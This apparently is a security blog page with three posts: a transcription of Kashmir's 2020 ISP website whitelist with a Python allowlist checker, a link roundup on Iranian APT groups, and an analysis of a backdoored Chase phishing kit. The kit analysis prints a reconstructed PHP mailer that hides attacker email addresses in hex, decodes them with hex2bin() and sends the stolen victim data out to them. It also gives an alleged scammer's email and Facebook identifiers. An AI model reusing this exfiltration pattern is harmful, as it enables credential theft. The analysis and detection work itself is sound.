Tuesday, January 28, 2020

How does a government censor the Internet? A rare peek from Jammu and Kashmir

From time to time we hear that a totalitarian government has locked down Internet access for part or all of its country.  Normally, that is about all we hear about the situation.  In the case of India, not normally thought of as a totalitarian government, we have a unique opportunity to look at exactly what is being censored as the authorities begin to relax the total lockout of Internet services that was put in place in Jammu and Kashmir.

The "lift" of total censorship began on January 14th, when Internet Service Providers were ordered to install firewalls that would only allow access to 153 government-approved websites.  As was pointed out by "The Wire", "No Mainstream News in List of 153 Whitelisted Websites Under Kashmir's First Govt Firewall."  TheWire.in noted that "Conspicuously absent from the list that includes Gmail, Netflix, Zomato, Oyo Rooms and Paytm are news and social media websites."

The order from the "Principal Secretary to the Government, Home Department" to the ISPs stated that the Internet shutdown was because "there have been number of reports of the use of internet in cross border terrorism/terror activities, incitement, rumour-mongering, etc. as also misuse of pre-paid mobile connections by anti-national elements."

Internet Order

The total ban of Internet services remained in effect for "the districts of Srinagar, Budgam, Ganderbal, Baramulla, Anantnag, Kulgan, Shopian, and Pulwama."  But "all the 10 districts of Jammu division and to begin with the revenue districts of Kupwara & Bandipora of the Kashmir Valley" were allowed access to the list of 158 websites beginning on January 18th, 2020.  (That list is available via Scribd here:  "Temporary Suspension of Telecom Services".)

A week later, the list was amended to include not only many News sites, as TheWire had pointed out, but also a large list of "Utilities" which included movie theaters, car dealerships, shoe sales websites, and pizza delivery services.

The new expanded list is provided below in a searchable form (the original is an image-based scan.)

I would invite others to make relevant observations in the comments sections, or in your own publications linking back to this page.  The list is intended to be a faithful representation of the new order, which can be found on the JK Home Office website as Home-05(TSTS) of 2020.

While the order has been commonly described as containing "300 URLs", there are a handful of duplicates, where a URL was included both with and without a trailing slash.  It should also be noted that a very large number of websites are included by domain suffix rather than by hostname, through the entries Ac.in (most academic institutions in India register under it), Gov.in (most Indian government offices and services), and Nic.in (the National Informatics Centre, under the Ministry of Electronics and Information Technology, which hosts a great many government sites).  These are second-level domains under the .in country-code TLD rather than TLDs themselves, but the effect is the same: every host under them is whitelisted by a single line.  The rest of the list is individual hostnames, mostly with a "www." prefix, so whether a filter built from it also admits a listed site's other hosts (mail.google.com alongside www.google.com, for example) depends entirely on how each ISP's firewall matches names, which the order does not specify.
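As an added example (not part of the original post, and not anything the ISPs are known to run), here is how the duplicates and the three suffix entries noted above behave once the list is turned into an actual allowlist. The code is mine; the sample entries are copied from the transcription below, the set of suffix entries is the three the post identifies, and the matching policy (exact hostname for ordinary entries, label-boundary suffix match for the three suffixes) is an assumption about how such a firewall would be configured.

```python
"""Normalise a hostname allowlist like the J&K order and check hosts against it.

Added example, not code from the original post.  RAW_ENTRIES is a constructed
sample copied from the transcribed list; SUFFIX_ENTRIES are the three entries
the post calls out as covering whole domain suffixes.
"""
from urllib.parse import urlsplit

RAW_ENTRIES = [
    "www.google.com",
    "www.google.com > gmail",           # bookmark-style "site > page" entry
    "www.financialexpress.com",
    "www.financialexpress.com/",        # same host, trailing slash: a duplicate
    "theprint.in",
    "theprint.in/",
    "Ac.in",                            # whole second-level suffix
    "Gov.in",
    "nic.in",
    "www.marutisuzuki.com/MarutiSuzuki/Car",
    "www.heromotocorpo.com/en-in/",
]

# Entries that are registry suffixes rather than single hosts.  This cannot be
# detected syntactically (scroll.in is one site, gov.in is a suffix), so it is
# an explicit, hand-maintained set.
SUFFIX_ENTRIES = {"ac.in", "gov.in", "nic.in"}


def entry_host(entry):
    """Return the lower-cased hostname of one whitelist entry, or None."""
    text = entry.strip().lower()
    if " > " in text:                    # "www.google.com > gmail" -> host only
        text = text.split(" > ", 1)[0]
    if "://" not in text:                # urlsplit needs a scheme to find a host
        text = "http://" + text
    host = urlsplit(text).hostname
    return host.rstrip(".") if host else None


def build_allowlist(entries):
    """Split the raw list into (exact hosts, suffixes), de-duplicated."""
    hosts = {h for h in (entry_host(e) for e in entries) if h}
    suffixes = {h for h in hosts if h in SUFFIX_ENTRIES}
    return hosts - suffixes, suffixes


def is_allowed(hostname, exact, suffixes):
    """Exact match for host entries; label-boundary suffix match for suffixes.

    endswith("." + s) rather than endswith(s), so that a host such as
    'evil-gov.in' does not ride in on the gov.in suffix.
    """
    h = hostname.strip().lower().rstrip(".")
    if h in exact:
        return True
    return any(h == s or h.endswith("." + s) for s in suffixes)


EXACT, SUFFIXES = build_allowlist(RAW_ENTRIES)

if __name__ == "__main__":
    print(len(EXACT), "distinct hosts;", len(SUFFIXES), "suffixes")
    for probe in ["www.google.com", "mail.google.com", "uidai.gov.in",
                  "iitd.ac.in", "evil-gov.in"]:
        print(f"{probe:20s} allowed={is_allowed(probe, EXACT, SUFFIXES)}")
```

Eleven raw entries collapse to five distinct hosts plus three suffixes, and under an exact-hostname policy mail.google.com is blocked even though www.google.com is allowed, which is precisely the ambiguity the order leaves to each ISP.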

It is curious how it was decided which websites to include and which to leave out.  For example, why include Adidas and Reebok, but not Nike?  I'm sure the programmers are thrilled to see that GitHub and Stack Overflow are included!  What other observations strike you as interesting?  Please comment or Tweet about them!


Site Number | Website URL | Category | Note
1 | www.google.com | Search Engines
2 | www.apple.com | Search Engines
3 | www.office.com | Search Engines
4 | www.google.com > chrome | Search Engines
5 | www.google.ca | Search Engines
6 | ca.search.yahoo.com | Search Engines
7 | search.yahoo.com | Search Engines
8 | www.live.com | Search Engines
9 | www.ask.com | Search Engines
10 | search.msn.com | Search Engines
11 | www.google.co.uk | Search Engines
12 | qc.search.yahoo.com | Search Engines
13 | www.hyundai.com | Automobiles
14 | www.suzukimotorcycle.co.in | Automobiles
15 | www.tata.com | Automobiles
16 | www.marutisuzuki.com/MarutiSuzuki/Car | Automobiles
17 | www.axisbank.com | Banking
18 | www.hdfc.com | Banking
19 | www.hdfcsec.com | Banking
20 | www.icicibank.com | Banking
21 | www.icicidirect.com | Banking
22 | www.jkbankonline.com | Banking
23 | www.onlinesbi.com | Banking
24 | www.pnbindia.in | Banking
25 | www.bankbazaar.com | Banking
26 | www.moneycontrol.com | Banking
27 | www.paisabazaar.com | Banking
28 | www.paypal.com | Banking
29 | www.policybazaar.com | Banking
30 | www.rbi.org.in | Banking
31 | www.westernunion.com | Banking
32 | jammuuniversity.in | Education
33 | jkpsc.nic.in | Education
34 | jkssb.nic.in | Education
35 | kashmiruniversity.net | Education
36 | skuastkashmir.ac.in | Education
37 | www.cukashmir.ac.in | Education
38 | www.freejobalert.com | Education
39 | mahendras.org | Education
40 | mrunal.org | Education
41 | www.bankersadda.com | Education
42 | www.indianetzone.com | Education
43 | www.insightsonindia.com | Education
44 | www.iustlive.com | Education
45 | www.tcyonline.com | Education
46 | www.vedantu.com | Education
47 | www.aakash.ac.in | Education
48 | www.britannica.com | Education
49 | www.burnhallschool.ac.in | Education
50 | www.byjus.com | Education
51 | www.damsdelhi.com | Education
52 | www.dpssrinagar.com | Education
53 | www.elsevier.com | Education
54 | www.foundationworldschool.com | Education
55 | www.gdgoenkasrinagar.com | Education
56 | www.github.com | Education
57 | www.gktoday.in | Education
58 | www.ignou.ac.in | Education
59 | www.indiankanoon.org | Education
60 | www.indiaresults.com | Education
61 | www.islamicuniversity.edu.in | Education
62 | www.lpu.in | Education
63 | www.madeeasy.in | Education
64 | www.mciindia.org | Education
65 | www.nature.com | Education
66 | www.nitsri.ac.in | Education
67 | www.pathfinderacademy.in | Education
68 | www.pchssrinagar.com | Education
69 | www.resonance.ac.in | Education
70 | www.sciencedirect.com | Education
71 | www.siu.edu.in | Education
72 | www.springer.com | Education
73 | www.ssmengg.edu.in | Education
74 | www.stackoverflow.com | Education
75 | www.udemy.com | Education
76 | www.unacademy.com | Education
77 | www.wikipedia.org | Education
78 | www.naukri.com | Employment
79 | www.jagranjosh.com | Employment
80 | www.sail.co.in | Employment
81 | Airtel TV | Entertainment
82 | Amazon Prime | Entertainment
83 | Hotstar | Entertainment
84 | gaana.com | Entertainment
85 | tatasky.com | Entertainment
86 | tvfplay.com | Entertainment
87 | www.altbalaji.com | Entertainment
88 | www.dishtv.in | Entertainment
89 | www.imdb.com | Entertainment
90 | www.jiosaavn.com | Entertainment
91 | www.spotify.com | Entertainment
92 | wynk.in | Entertainment
93 | Netflix | Entertainment
94 | Sony Liv | Entertainment
95 | Voot | Entertainment
96 | www.crickbuzz.com | Entertainment
97 | www.espn.in | Entertainment
98 | Zee5 | Entertainment
99 | www.google.com > gmail | Mail
100 | in.mail.yahoo.com | Mail
101 | mail.rediff.com | Mail
102 | outlook.live.com | Mail
103 | news.statetimes.in | Mail
104 | prsindia.org | Mail
105 | www.earlytimes.in | Entertainment
106 | www.kashmirtimes.com | News
107 | www.kashmiruzma.net | News
108 | www.risingkashmir.com | News
109 | www.thenorthlines.com | News
110 | aajtak.intoday.in | News
111 | economictimes.indiatimes.com | News
112 | edition.cnn.com | News
113 | kashmirage.net | News
114 | kashmirobserver.net | News
115 | news.google.com | News
116 | scroll.in | News
117 | thekashmirimages.com | News
118 | theprint.in | News
119 | theprint.in | News | DUPLICATE
120 | thewire.in | News
121 | timesofindia.indiatimes.com | News
122 | www.aljazeera.com | News
123 | www.amarujala.com | News
124 | www.bbc.com | News
125 | www.business-standard.com | News
126 | www.channelnewsasia.com | News
127 | www.dailyexcelsior.com | News
128 | www.dailypioneer.com | News
129 | www.deccanchronicle.com | News
130 | www.epw.in | News
131 | www.financialexpress.com | News
132 | www.financialexpress.com | News | DUPLICATE
133 | www.forbes.com | News
134 | www.greaterkashmir.com | News
135 | www.hindustantimes.com | News
136 | www.jagran.com | News
137 | www.livemint.com | News
138 | www.mid-day.com | News
139 | www.moneycontrol.com | News
140 | www.moneycontrol.com | News | DUPLICATE
141 | www.ndtv.com | News
142 | www.newindianexpress.com | News
143 | www.news18.com | News
144 | www.nytimes.com | News
145 | www.outlookindia.com | News
146 | www.outlookindia.com | News | DUPLICATE
147 | www.presstv.com | News
148 | www.presstv.com | News | DUPLICATE
149 | www.republicworld.com | News
150 | www.scoopwhoop.com | News
151 | www.telegraphindia.com | News
152 | www.theguardian.com | News
153 | www.thehindu.com | News
154 | www.thehindubusinessline.com | News
155 | www.thekashmirmonitor.net | News
156 | www.thelallantop.com | News
157 | www.thequint.com | News
158 | www.timesnownews.com | News
159 | www.tribuneindia.com | News
160 | www.washingtonpost.com | News
161 | www.wionews.com | News
162 | www.wsj.com | News
163 | www.amnesty.org | NGOs
164 | www.fordfoundation.org | NGOs
165 | www.helpageindia.org | NGOs
166 | www.savethechildren.in | NGOs
167 | www.smilefoundationindia.org | NGOs
168 | Ac.in | Services
169 | Gov.in | Services
170 | www.incometaxindiaefiling.gov.in | Services
171 | www.jkpolice.gov.in | Services
172 | www.passportindia.gov.in | Services
173 | www.services.gst.gov.in | Services
174 | enps.nsdl.com | Services
175 | uidai.gov.in | Services
176 | nic.in | Services
177 | www.gmcs.edu.in | Services
178 | www.lalpathlabs.com | Services
179 | www.shifamedcenter.com | Services
180 | www.skims.ac.in | Services
181 | geekyranjit.com | Technology Updates
182 | overdrive.in | Technology Updates
183 | beebom.com | Technology Updates
184 | www.androidauthority.com | Technology Updates
185 | www.autocarindia.com | Technology Updates
186 | www.carwale.com | Technology Updates
187 | www.cnet.com | Technology Updates
188 | www.digit.in | Technology Updates
189 | www.engadget.com | Technology Updates
190 | www.gsmarena.com | Technology Updates
191 | www.pcmag.com | Technology Updates
192 | www.techradar.com | Technology Updates
193 | www.theverge.com | Technology Updates
194 | www.zigwheels.com | Technology Updates
195 | www.cleartrip.com | Travel
196 | www.goibibo.com | Travel
197 | www.irctc.co.in | Travel
198 | www.makemytrip.com | Travel
199 | www.yatra.com | Travel
200 | www.airindia.com | Travel
201 | www.cleartrip.com | Travel
202 | www.easemytrip.com | Travel
203 | www.flightstats.com | Travel
204 | www.hajcommitee.gov.in | Travel | TYPO
205 | www.iismgulmarg.in | Travel
206 | www.incredibleindia.org | Travel
207 | www.ixigo.com | Travel
208 | www.jktourism.org | Travel
209 | www.oyorooms.com | Travel
210 | www.pawanhans.co.in | Travel
211 | www.redbus.in | Travel
212 | www.shriamarnathjishrine.com | Travel
213 | www.trivago.com | Travel
214 | www.trivago.in | Travel
215 | jakemp.nic.in | Utilities
216 | www.jabong.com | Utilities
217 | billsahuliyat.jkpdd.net | Utilities
218 | earth.google.com | Utilities
219 | www.airtel.in | Utilities
220 | www.amazon.in | Utilities
221 | www.bhimupi.org.in | Utilities
222 | www.flipkart.com | Utilities
223 | www.healthkart.com | Utilities
224 | www.myntra.com | Utilities
225 | www.netmeds.com | Utilities
226 | www.paytmbank.com | Utilities
227 | JIO chat | Utilities
228 | www.99acres.com | Utilities
229 | www.airtel.in | Utilities | DUPLICATE
230 | www.bharatpetroleum.com | Utilities
231 | www.bluedart.com | Utilities
232 | www.bsnl.co.in | Utilities
233 | www.cardekho.com | Utilities
234 | www.dtdc.in | Utilities
235 | www.ebharatgas.com | Utilities
236 | www.fedex.com | Utilities
237 | www.firstflight.net | Utilities
238 | www.freecharge.in | Utilities
239 | www.gaadiwaadi.com | Utilities
240 | www.gati.com | Utilities
241 | www.indane.co.in | Utilities
242 | www.indiamart.com | Utilities
243 | www.jio.com | Utilities
244 | www.jkhandicrafts.com | Utilities
245 | www.jkpdd.gov.in | Utilities
246 | www.jkpwdrb.nic.in | Utilities
247 | www.justdial.com | Utilities
248 | www.magicbricks.com | Utilities
249 | www.myhpgas.in | Utilities
250 | www.olx.in | Utilities
251 | www.pharmeasy.in | Utilities
252 | www.quikr.com | Utilities
253 | www.sulekha.com | Utilities
254 | www.tbmes.org | Utilities
255 | www.vodafone.in | Utilities
256 | www.zomato.com | Utilities
257 | cleartax.in | Utilities
258 | in.bookmyshow.com | Utilities
259 | keep.google.com | Utilities
260 | lens.google.com | Utilities
261 | oppo-in | Utilities
262 | support.google.com | Utilities
263 | support.microsoft.com | Utilities
264 | translate.google.co.in | Utilities
265 | vimeo.com | Utilities
266 | wikimapia.org | Utilities
267 | www.adidas.co.in | Utilities
268 | www.ajio.com | Utilities
269 | www.aliexpress.com | Utilities
270 | www.bajaauto.com | Utilities
271 | www.bing.com | Utilities
272 | www.decathlon.in | Utilities
273 | www.dell.com | Utilities
274 | www.dominos.co.in | Utilities
275 | www.fabindia.com | Utilities
276 | www.gingerlabs.com | Utilities
277 | www.heromotocorpo.com/en-in/ | Utilities
278 | www.houzz.in | Utilities
279 | www.indeed.co.in | Utilities
280 | www.india.ford.com | Utilities
281 | www.indiamart.com | Utilities
282 | www.jeep-india.com | Utilities
283 | www.kia.com | Utilities
284 | www.kinemaster.com | Utilities
285 | www.lenovo.com | Utilities
286 | www.lenskart.com | Utilities
287 | www.office.com | Utilities | DUPLICATE
288 | www.pizzahut.co.in | Utilities
289 | www.pvrcinemas.com | Utilities
290 | www.quora.com | Utilities
291 | www.reebok.com | Utilities
292 | www.shopclues.com | Utilities
293 | www.swiggy.com | Utilities
294 | www.tatamotors.com | Utilities
295 | www.toyotabharat.com | Utilities
296 | www.upwork.com | Utilities
297 | www.wavecinemas.com | Utilities
298 | www.upwork.com | Utilities | DUPLICATE
299 | www.zomato.com | Utilities
300 | www8.hp.com | Utilities
301 | www.accuweather.com | Utilities

Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings from CISA.gov at the meeting, so I want to start by sharing a link to their CISA Insights Page, where they released earlier this week some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with Cyber attacks when they can't accomplish what they want with the limited reach of their military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, who recommends their "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to "Very Good" and "Excellent" steps as your org matures your security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) groups, and that there is much more to watching for such activity than patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT groups.  Often these insights include known malware families used by the actor, or which sectors or countries the threat group has historically attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if there is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) for the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of a "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT group naming in general, is that there is a great deal of disagreement about which group names are aliases for the same group, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

Most every vendor it seems likes to put their own personal spin on APT Groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different Animal to label each APT Group based on the name of the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?)

While there are several excellent APT Disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops ) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT Groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT Groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz ad-Din al-Qassam - the bank DDoS guys.
  • DarkHydrus (AKA Lazy Meerkat) - some say this is actually also Slayer Kitten, others disagree
  • Gold Lowell (AKA Boss Spider) - these are the SamSam ransomware guys

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?



Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government-issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone updated his YouTube channel, "mr azert", with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages.")

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and PayPal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!


After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address (foley.victoria998@gmail.com) and Facebook address ( jone.fredrick.79).


Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose  "Spam or misleading" and then the subcategory "Scams / fraud"



In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of the kits.  We'll look at the Chase one first.   There are five separate PHP files that send the various stolen information back to the person using the kit.  



When we look at the actual "send" routine, we notice that the mail call sits inside a loop over $send ("foreach $send") ... but the instructions for the kit told the downloader to put their own email address in one particular place, which is "import"ed into this code.  So what other address is being used here?


If we scroll up a bit we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it from hex into ASCII with "hex2bin".


The calling code in this case is "myaccount.php" which seems to do some "input validation" but in reality, is also loading the "token" value:


That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  

  fenction@gmail.com  and fenction@yahoo.com

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.
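The backdoor pattern described above, as an added example that is neither the kit's code nor part of the original post: a constructed stand-in for the two files (the page that plants the hidden "token" and the mailer that hex2bin()s it), and a small Python triage script of the kind an analyst would run over an unpacked kit to find hex literals that decode to e-mail addresses and to flag hex2bin() applied straight to request input. The file contents, the file name send.php and the comma between the two addresses are assumptions; the two addresses are the ones quoted above.

```python
"""Triage a phishing kit for hex-hidden exfiltration addresses.

Added example, not code from the kit or the post.  SAMPLE_KIT is a constructed
stand-in for the two files the post describes; only the two decoded addresses
come from the post, and the comma between them is an assumption.
"""
import re

SAMPLE_KIT = {
    "myaccount.php": r'''<?php
// "input validation" that also carries the hidden token forward
if (empty($_POST['user'])) { header("Location: login.php"); exit; }
?>
<form method="post" action="send.php">
<input type="hidden" name="token"
 value="66656e6374696f6e40676d61696c2e636f6d2c66656e6374696f6e407961686f6f2e636f6d">
''',
    "send.php": r'''<?php
$recipient = "YOUR_EMAIL_HERE";                  // the address the downloader edits
$send = explode(",", hex2bin($_POST['token']));  // the addresses he never sees
$send[] = $recipient;
foreach ($send as $to) { mail($to, "Chase Result", $message); }
''',
}

# An even-length run of at least 16 hex digits, not embedded in a longer run.
HEX_LITERAL = re.compile(r'(?<![0-9a-fA-F])((?:[0-9a-fA-F]{2}){8,})(?![0-9a-fA-F])')
EMAIL = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')


def decode_hex_literals(text):
    """Yield (hex, decoded) for each hex run that decodes to printable ASCII."""
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue                     # binary blob, not a hidden string
        if decoded.isprintable():
            yield m.group(1), decoded


def find_hidden_recipients(kit):
    """Map file name -> sorted e-mail addresses hidden in hex literals."""
    found = {}
    for name, text in kit.items():
        addrs = set()
        for _, decoded in decode_hex_literals(text):
            addrs.update(EMAIL.findall(decoded))
        if addrs:
            found[name] = sorted(addrs)
    return found


def uses_hex2bin_on_input(text):
    """True if the file feeds request data straight into hex2bin()."""
    return re.search(r'hex2bin\s*\(\s*\$_(POST|GET|REQUEST)\b', text) is not None


if __name__ == "__main__":
    for name, addrs in find_hidden_recipients(SAMPLE_KIT).items():
        print(f"{name}: hidden recipients {addrs}")
    for name, text in SAMPLE_KIT.items():
        if uses_hex2bin_on_input(text):
            print(f"{name}: hex2bin() applied to request input")
```

Run over a real kit, the same two checks are worth extending to base64_decode(), str_rot13() and gzinflate() wrappers, since kit authors rotate the encoding but not the trick: the downloader is told to edit one variable, and the loop sends to a list he never reads.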

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!